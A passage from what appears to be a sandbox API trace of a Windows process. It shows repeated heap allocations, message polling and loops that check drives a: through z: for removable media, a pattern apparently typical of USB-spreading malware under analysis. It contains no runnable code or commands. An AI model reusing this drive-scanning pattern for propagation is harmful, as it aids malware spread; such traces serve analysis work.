returned 0x14bd100 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0214.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0214.285] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.285] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.285] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.285] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.285] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.286] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.286] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.286] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.286] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.286] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.287] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.287] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.287] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.287] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.287] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.288] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.288] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.288] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.288] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.288] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.288] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.289] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.289] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.289] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.289] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.289] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.289] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0214.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.290] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0214.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0214.291] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0214.291] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.292] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.292] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.292] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.292] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0214.293] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.293] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.293] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.293] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.293] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.294] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.294] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.294] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.294] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.294] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.295] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.295] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.295] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.295] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.296] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.296] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.296] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.296] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.296] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.297] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.297] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.297] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.297] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.297] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.298] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.298] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.298] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.298] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0214.298] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.298] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.299] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.299] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.299] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.299] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.299] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0214.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0214.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.299] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.299] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.299] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0214.299] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.299] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0214.300] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.300] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0214.300] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.300] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.300] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.300] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.300] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.300] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.300] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.300] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.300] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.300] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.300] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.300] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0214.300] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.300] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0214.300] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.300] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.301] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0214.301] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.301] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.301] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.301] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.301] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.301] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0214.301] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.301] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.301] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.301] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.301] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.302] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.302] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.302] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.302] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.302] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.303] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.303] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.303] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.303] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.303] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.304] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.304] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.304] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.304] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.305] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.305] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.305] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.305] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.305] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.306] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.306] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.306] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.306] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0214.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.307] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0214.307] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.307] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.307] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.307] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0214.307] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.307] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.308] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.308] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.308] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.308] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.308] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.308] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.309] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.309] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.309] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.309] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.309] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.309] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.310] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.310] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.310] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.311] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.311] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.311] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.311] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.311] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.311] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.312] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.312] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.312] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.312] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.312] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.313] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fa0 | out: hHeap=0x12c0000) returned 1 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0214.313] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0214.313] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, 